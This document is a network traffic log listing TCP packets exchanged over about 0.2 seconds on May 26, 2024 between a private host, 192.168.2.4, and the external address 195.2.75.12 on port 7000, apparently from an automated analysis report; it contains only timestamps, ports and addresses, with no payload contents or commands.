May 26, 2024 01:21:25.313095093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.313118935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.313150883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.313198090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.317534924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.317594051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.317749977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.317869902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.317909002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.318042040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.322318077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.322357893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.322478056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.322643995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.322680950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.322865963 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.327254057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.327316999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.327367067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.327492952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.327574968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.327614069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.327692032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.332088947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.332151890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.332221985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.332308054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.332346916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.332370996 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.336724043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.336782932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.336819887 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.336863041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.337070942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.337115049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.337152004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.337258101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.341455936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.341491938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.341604948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.341825962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.341861010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.341892004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.341978073 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.346404076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.346468925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.346544027 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.346626043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.346662045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.346698999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.346735001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.346759081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.355396032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.355456114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.355525970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.355617046 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.355669022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.355705976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.355732918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.360137939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.360291004 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.360440969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.360477924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.362464905 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.364731073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.364767075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.364799023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.365046978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.365222931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.365272045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.365299940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.365335941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.367388964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.369534016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.369570017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.369801044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.369990110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.370038986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.370075941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.370105028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.374340057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.374378920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.374452114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.374754906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.374790907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.374825001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.374850988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.374892950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.379478931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.379514933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.379574060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.379808903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.379842997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.379949093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.384231091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.384265900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.384325981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.384583950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.384618998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.384727001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.389250040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.389341116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.389379978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.389415026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.389465094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.389501095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.389575958 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.394083023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.394172907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.394210100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.394262075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.394283056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.394342899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.398885965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.398978949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.399017096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.399063110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.399092913 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.399118900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.399154902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.399223089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.403707981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.403769016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.404083967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.404232979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.404284954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.404316902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.404356956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.404383898 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.404412985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.410413027 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.410465956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.410533905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.410578012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.410613060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.410648108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.410670996 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.415175915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.415210962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.415285110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.415333033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.415369987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.415394068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.419966936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.420002937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.420111895 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.420171976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.420206070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.420229912 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.420259953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.423042059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.424731970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.424765110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.424874067 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.424935102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.424968958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.425246000 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.429585934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.429621935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.429899931 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.430048943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.430100918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.430136919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.430205107 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.434389114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.434425116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.434463978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.434907913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.434967041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.435054064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.439351082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.439414978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.439493895 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.439611912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.439646959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.439675093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.444217920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.444278955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.444314003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.444439888 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.444439888 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.444720030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.444781065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.444901943 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.448949099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.449009895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.449191093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.449479103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.449539900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.449754953 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.453551054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.453598022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.453632116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.453819036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.454137087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.454199076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.454325914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.458591938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.458653927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.458688974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.458815098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.458852053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.458924055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.458924055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.458924055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.463495970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.463587999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.463625908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.463660955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.463689089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.463695049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.463762999 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.468213081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.468274117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.468389988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.468426943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.468430996 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.468517065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.472855091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.472896099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.472930908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.473154068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.473155022 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.473335981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.473401070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.473593950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.478557110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.478609085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.478645086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.478678942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.478708982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.478741884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.478768110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.478848934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.478848934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.483238935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.483375072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.483424902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.483532906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.483704090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.483738899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.483771086 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.488091946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.488184929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.488590002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.488625050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.488723040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.488918066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.492852926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.493035078 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.493619919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.493654966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.493689060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.493751049 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.497668028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.497703075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.497801065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.498434067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.498470068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.498548985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.502660990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.502720118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.502919912 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.503247023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.503304958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.503325939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.503340960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.506371021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.507360935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.507422924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.507487059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.507986069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.508023024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.511553049 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.513860941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.513921976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.513957977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514019012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514072895 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.514123917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514136076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.514177084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514211893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514266968 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.514269114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514309883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.514337063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.515221119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515281916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515317917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515356064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515371084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.515389919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515392065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.515448093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.515896082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515933037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.515966892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516001940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516033888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516037941 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.516072035 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.516796112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516829967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516864061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516864061 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.516897917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.516927958 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.517715931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.517750978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.517782927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.517797947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.517818928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.517855883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.517883062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.517930984 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.518623114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.518657923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.518692017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.518724918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.518728018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.518758059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.518852949 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.519540071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.519575119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.519608021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.519640923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.519705057 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.520401001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.520436049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.520471096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.520530939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.520560980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.520893097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.525168896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.525310993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.525629997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.525717974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.525829077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.525990009 CEST	49730	7000	192.168.2.4	195.2.75.12
